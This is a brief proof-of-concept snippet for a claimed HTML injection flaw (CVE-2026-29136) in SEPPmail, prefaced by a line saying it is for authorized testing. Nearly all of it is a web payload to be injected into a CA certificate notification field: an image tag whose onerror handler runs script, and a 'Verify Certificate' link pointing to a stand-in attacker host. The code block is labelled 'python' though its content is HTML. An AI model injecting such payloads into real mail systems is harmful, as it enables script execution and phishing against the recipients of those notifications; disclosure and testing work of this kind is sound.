The following code is for security research and authorized testing only.
python
<!--
PoC for CVE-2026-29136: HTML Injection in SEPPmail
Inject the following payload into the CA certificate notification field.
-->
<img src="invalid_url" onerror="alert('CVE-2026-29136 PoC Executed')">
<a href="http://attacker-controlled-site.com">Verify Certificate</a>